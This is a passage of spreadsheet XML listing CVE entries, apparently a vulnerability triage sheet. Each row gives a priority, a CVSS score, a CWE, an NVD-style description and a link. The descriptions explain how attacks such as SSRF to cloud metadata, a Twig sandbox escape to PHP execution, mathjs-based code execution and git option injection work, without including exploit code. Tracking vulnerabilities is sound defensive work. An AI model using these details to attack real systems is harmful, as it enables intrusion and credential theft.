        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1308" s="5" t="inlineStr"/>
      <c r="K1308" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1308" s="5" t="inlineStr">
        <is>
          <t>DreamMaker developed by Interinfo has a SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands to read, modify, and delete database contents.</t>
        </is>
      </c>
      <c r="M1308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85540</t>
        </is>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85581</t>
        </is>
      </c>
      <c r="C1309" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1309" s="5" t="inlineStr"/>
      <c r="F1309" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1309" s="5" t="inlineStr"/>
      <c r="H1309" s="5" t="inlineStr"/>
      <c r="I1309" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1309" s="5" t="inlineStr"/>
      <c r="K1309" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1309" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a denial of service vulnerability in the unauthenticated /api/system/uiproc endpoint that accepts and retains attacker-controlled process identifiers without size limits or authentication. Attackers can send repeated requests with unique identifiers to exhaust process memory and degrade service availability.</t>
        </is>
      </c>
      <c r="M1309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85581</t>
        </is>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85584</t>
        </is>
      </c>
      <c r="C1310" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1310" s="5" t="inlineStr"/>
      <c r="F1310" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1310" s="5" t="inlineStr"/>
      <c r="H1310" s="5" t="inlineStr"/>
      <c r="I1310" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1310" s="5" t="inlineStr"/>
      <c r="K1310" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1310" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a denial of service vulnerability in the publish-service Basic Auth throttle that stores failed-attempt state using attacker-controlled usernames without enforcing capacity limits or eviction policies. Unauthenticated attackers can submit repeated authentication requests with unique invalid usernames to exhaust memory and increase synchronization overhead, degrading service availability.</t>
        </is>
      </c>
      <c r="M1310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85584</t>
        </is>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85585</t>
        </is>
      </c>
      <c r="C1311" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1311" s="5" t="inlineStr"/>
      <c r="F1311" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1311" s="5" t="inlineStr"/>
      <c r="H1311" s="5" t="inlineStr"/>
      <c r="I1311" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1311" s="5" t="inlineStr"/>
      <c r="K1311" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1311" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains an unbounded resource consumption vulnerability in the request-concurrency middleware that retains mutex entries for every unique request path without eviction. Unauthenticated attackers can send numerous unique request paths to permanently increase process memory and synchronization overhead, degrading availability.</t>
        </is>
      </c>
      <c r="M1311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85585</t>
        </is>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85604</t>
        </is>
      </c>
      <c r="C1312" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1312" s="5" t="inlineStr"/>
      <c r="F1312" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1312" s="5" t="inlineStr"/>
      <c r="H1312" s="5" t="inlineStr"/>
      <c r="I1312" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1312" s="5" t="inlineStr"/>
      <c r="K1312" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1312" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.18 (affected versions &lt;= 2.0.17) contains a remote code execution vulnerability in the Twig sort filter. The sortFunc wrapper in GravExtension.php hardcodes Twig's isSandboxed argument to false, so unlike |map/|filter/|reduce, |sort accepts a plain function name inside the sandbox; the remaining denylist misses spl_autoload, which performs a PHP include. An authenticated user with only page-write rights (admin.pages or api.pages.write) can supply a crafted payload (e.g., via form frontmatter rendered by the Email plugin) that invokes spl_autoload through the sort filter, resulting in arbitrary PHP execution as the web server user.</t>
        </is>
      </c>
      <c r="M1312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85604</t>
        </is>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85607</t>
        </is>
      </c>
      <c r="C1313" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1313" s="5" t="inlineStr"/>
      <c r="F1313" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1313" s="5" t="inlineStr"/>
      <c r="H1313" s="5" t="inlineStr"/>
      <c r="I1313" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1313" s="5" t="inlineStr"/>
      <c r="K1313" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1313" s="5" t="inlineStr">
        <is>
          <t>Blinko 1.8.7 contains an authorization bypass (IDOR) vulnerability in multiple tRPC procedures (message.list, message.update, message.delete, message.clearAfter in server/routerTrpc/message.ts and conversation.clearMessages in server/routerTrpc/conversation.ts). Although these procedures require authentication, they query the database by caller-supplied conversation or message ID without verifying that the resource belongs to the requesting account. Any authenticated user can therefore read another user's full AI chat history, modify individual message content, and delete or wipe entire conversations by enumerating sequential integer IDs.</t>
        </is>
      </c>
      <c r="M1313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85607</t>
        </is>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85608</t>
        </is>
      </c>
      <c r="C1314" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1314" s="5" t="inlineStr"/>
      <c r="F1314" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1314" s="5" t="inlineStr"/>
      <c r="H1314" s="5" t="inlineStr"/>
      <c r="I1314" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1314" s="5" t="inlineStr"/>
      <c r="K1314" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1314" s="5" t="inlineStr">
        <is>
          <t>Douyin_TikTok_Download_API through 4.1.2 contains a server-side request forgery vulnerability in the /api/download and /api/hybrid/video_data endpoints that allows unauthenticated attackers to fetch arbitrary URLs by supplying a url query parameter. Attackers can request internal services including cloud metadata endpoints and retrieve response bodies containing sensitive credentials through error messages.</t>
        </is>
      </c>
      <c r="M1314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85608</t>
        </is>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85610</t>
        </is>
      </c>
      <c r="C1315" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1315" s="5" t="inlineStr"/>
      <c r="F1315" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1315" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1315" s="5" t="inlineStr"/>
      <c r="I1315" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1315" s="5" t="inlineStr"/>
      <c r="K1315" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1315" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 fails to properly validate chart formula expressions, allowing authenticated project members with read access to execute arbitrary code by recovering the native JavaScript Function constructor through mathjs matrix objects. Attackers can use the recovered constructor to load Node.js built-ins and execute operating system commands with the privileges of the API process, bypassing organization authorization boundaries.</t>
        </is>
      </c>
      <c r="M1315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85610</t>
        </is>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85612</t>
        </is>
      </c>
      <c r="C1316" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1316" s="5" t="inlineStr"/>
      <c r="F1316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1316" s="5" t="inlineStr"/>
      <c r="H1316" s="5" t="inlineStr"/>
      <c r="I1316" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1316" s="5" t="inlineStr"/>
      <c r="K1316" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1316" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains an unauthenticated server-side request forgery vulnerability in the /misc/favicon and /misc/og endpoints that accept an attacker-supplied url parameter with insufficient validation. Attackers can force the API to fetch arbitrary internal hosts and cloud metadata endpoints, with small responses returned verbatim enabling credential theft and internal service enumeration.</t>
        </is>
      </c>
      <c r="M1316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85612</t>
        </is>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85617</t>
        </is>
      </c>
      <c r="C1317" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1317" s="5" t="inlineStr"/>
      <c r="F1317" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1317" s="5" t="inlineStr"/>
      <c r="H1317" s="5" t="inlineStr"/>
      <c r="I1317" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1317" s="5" t="inlineStr"/>
      <c r="K1317" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1317" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.6.3 contain an authorization bypass vulnerability in the bulk delete functionality that allows restricted users to soft-delete users outside their authorized scope. Attackers can include unauthorized user IDs in bulk delete requests to bypass instance-level restrictions and modify or disable accounts they should not access.</t>
        </is>
      </c>
      <c r="M1317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85617</t>
        </is>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85623</t>
        </is>
      </c>
      <c r="C1318" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1318" s="5" t="inlineStr"/>
      <c r="F1318" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1318" s="5" t="inlineStr"/>
      <c r="H1318" s="5" t="inlineStr"/>
      <c r="I1318" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1318" s="5" t="inlineStr"/>
      <c r="K1318" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1318" s="5" t="inlineStr">
        <is>
          <t>goose 1.37.0 executes arbitrary commands from recipe stdio extensions and retry.checks without security inspection. Attackers can distribute malicious recipes that execute shell commands as the user running goose, bypassing the recipe security scan which does not inspect extensions or retry configurations.</t>
        </is>
      </c>
      <c r="M1318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85623</t>
        </is>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85626</t>
        </is>
      </c>
      <c r="C1319" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1319" s="5" t="inlineStr"/>
      <c r="F1319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1319" s="5" t="inlineStr"/>
      <c r="H1319" s="5" t="inlineStr"/>
      <c r="I1319" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1319" s="5" t="inlineStr"/>
      <c r="K1319" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1319" s="5" t="inlineStr">
        <is>
          <t>git-mcp-server 2.15.1 contains an argument injection vulnerability in the ref and object parameters of git_log, git_diff, and git_show tools that lack leading-dash validation. Attackers can inject git command-line options like --output= to write files outside the repository to arbitrary paths accessible by the process.</t>
        </is>
      </c>
      <c r="M1319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85626</t>
        </is>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85664</t>
        </is>
      </c>
      <c r="C1320" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1320" s="5" t="inlineStr"/>
      <c r="F1320" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1320" s="5" t="inlineStr"/>
      <c r="H1320" s="5" t="inlineStr"/>
      <c r="I1320" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1320" s="5" t="inlineStr"/>
      <c r="K1320" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1320" s="5" t="inlineStr">
        <is>
          <t>Chroma 1.5.9 fails to validate maximum bounds on HNSW index parameters max_neighbors, ef_construction, and ef_search in collection-create requests. Unauthenticated attackers can supply arbitrarily large parameter values to exhaust server memory and cause denial of service during index compaction.</t>
        </is>
      </c>
      <c r="M1320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85664</t>
        </is>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85686</t>
        </is>
      </c>
      <c r="C1321" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1321" s="5" t="inlineStr"/>
      <c r="F1321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1321" s="5" t="inlineStr"/>
      <c r="H1321" s="5" t="inlineStr"/>
      <c r="I1321" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1321" s="5" t="inlineStr"/>
      <c r="K1321" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1321" s="5" t="inlineStr">
        <is>
          <t>ms-swift 4.5.2 contains a server-side request forgery vulnerability in the swift deploy OpenAI-compatible API that fetches multimodal media URLs without validation or redirect filtering. Unauthenticated attackers can supply arbitrary image_url, audio_url, or video_url parameters to make the server issue requests to internal services and cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="M1321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85686</t>
        </is>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85687</t>
        </is>
      </c>
      <c r="C1322" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1322" s="5" t="inlineStr"/>
      <c r="F1322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1322" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1322" s="5" t="inlineStr"/>
      <c r="I1322" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1322" s="5" t="inlineStr"/>
      <c r="K1322" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1322" s="5" t="inlineStr">
        <is>
          <t>surya 0.22.1 screenshot server contains an unauthenticated arbitrary file read vulnerability in the /info, /page, and /process routes that accept raw file_path parameters. Attackers can read any image or PDF file on the host by supplying arbitrary file paths to Image.open or pypdfium2.PdfDocument, obtaining rendered contents as base64 and using /info as an existence oracle.</t>
        </is>
      </c>
      <c r="M1322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85687</t>
        </is>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85691</t>
        </is>
      </c>
      <c r="C1323" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1323" s="5" t="inlineStr"/>
      <c r="F1323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1323" s="5" t="inlineStr"/>
      <c r="H1323" s="5" t="inlineStr"/>
      <c r="I1323" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1323" s="5" t="inlineStr"/>
      <c r="K1323" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1323" s="5" t="inlineStr">
        <is>
          <t>MegaParse 0.0.55 contains an unauthenticated server-side request forgery vulnerability in the POST /v1/url endpoint that fetches caller-supplied URLs server-side. Attackers can supply internal service URLs or metadata endpoints without authentication to read their responses directly from the JSON response.</t>
        </is>
      </c>
      <c r="M1323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85691</t>
        </is>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85699</t>
        </is>
      </c>
      <c r="C1324" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1324" s="5" t="inlineStr"/>
      <c r="F1324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1324" s="5" t="inlineStr"/>
      <c r="H1324" s="5" t="inlineStr"/>
      <c r="I1324" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1324" s="5" t="inlineStr"/>
      <c r="K1324" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1324" s="5" t="inlineStr">
        <is>
          <t>jina-ai reader contains a server-side request forgery vulnerability where URL validation is performed only on the initial request but not re-applied to subsequent redirect hops. Attackers can craft a public URL that redirects to internal network addresses or cloud metadata endpoints, allowing the server to fetch and return the target's response body to the attacker.</t>
        </is>
      </c>
      <c r="M1324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85699</t>
        </is>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85786</t>
        </is>
      </c>
      <c r="C1325" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1325" s="5" t="inlineStr"/>
      <c r="F1325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1325" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1325" s="5" t="inlineStr"/>
      <c r="I1325" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1325" s="5" t="inlineStr"/>
      <c r="K1325" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1325" s="5" t="inlineStr">
        <is>
          <t>Improper handling of highly compressed data in Amazon ion-java before 1.12.1 might allow remote attackers to cause a denial of service via a crafted compressed Ion document that expands to an arbitrarily large size upon decompression due to insufficient coverage of the GZIP auto-decompression opt-out introduced for CVE-2026-75936.
To remediate this issue, users should upgrade to version 1.12.1.</t>
        </is>
      </c>
      <c r="M1325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85786</t>
        </is>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86075</t>
        </is>
      </c>
      <c r="C1326" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1326" s="5" t="inlineStr"/>
      <c r="F1326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1326" s="5" t="inlineStr"/>
      <c r="H1326" s="5" t="inlineStr"/>
      <c r="I1326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1326" s="5" t="inlineStr"/>
      <c r="K1326" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1326" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t>
        </is>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86076</t>
        </is>
      </c>
      <c r="C1327" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1327" s="5" t="inlineStr"/>
      <c r="F1327" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1327" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1327" s="5" t="inlineStr"/>
      <c r="I1327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1327" s="5" t="inlineStr"/>
      <c r="K1327" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1327"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M1327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t>
        </is>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86169</t>
        </is>
      </c>
      <c r="C1328" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1328" s="5" t="inlineStr"/>
      <c r="F1328" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1328" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1328" s="5" t="inlineStr"/>
      <c r="I1328" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1328" s="5" t="inlineStr"/>
      <c r="K1328" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L1328" s="5" t="inlineStr">
        <is>
          <t>Axolotl through 0.18.0 contains a remote code execution vulnerability in the multipack patch path where trust_remote_code defaults to None instead of False, causing the security guard to be bypassed. Attackers can execute arbitrary Python code by crafting a malicious Hugging Face model repository selected as base_model, which is loaded with hardcoded trust_remote_code=True during AutoModelForCausalLM.from_pretrained.</t>
        </is>
      </c>
      <c r="M1328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86169</t>
        </is>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86173</t>
        </is>
      </c>
      <c r="C1329" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1329" s="5" t="inlineStr"/>
      <c r="F1329" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1329" s="5" t="inlineStr"/>
      <c r="H1329" s="5" t="inlineStr"/>
      <c r="I1329" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1329" s="5" t="inlineStr"/>
      <c r="K1329" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1329" s="5" t="inlineStr">
        <is>
          <t>MindsDB through 26.1.0 contains a server-side request forgery vulnerability in the web crawler handler that allows unauthenticated attackers to fetch arbitrary URLs by supplying caller-controlled URLs to CrawlerTable.list. Attackers can bypass the allowlist control by exploiting the default empty configuration and access internal services and cloud metadata endpoints without authentication.</t>
        </is>
      </c>
      <c r="M1329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86173</t>
        </is>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86177</t>
        </is>
      </c>
      <c r="C1330" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1330" s="5" t="inlineStr"/>
      <c r="F1330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1330" s="5" t="inlineStr"/>
      <c r="H1330" s="5" t="inlineStr"/>
      <c r="I1330" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1330" s="5" t="inlineStr"/>
      <c r="K1330" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1330" s="5" t="inlineStr">
        <is>
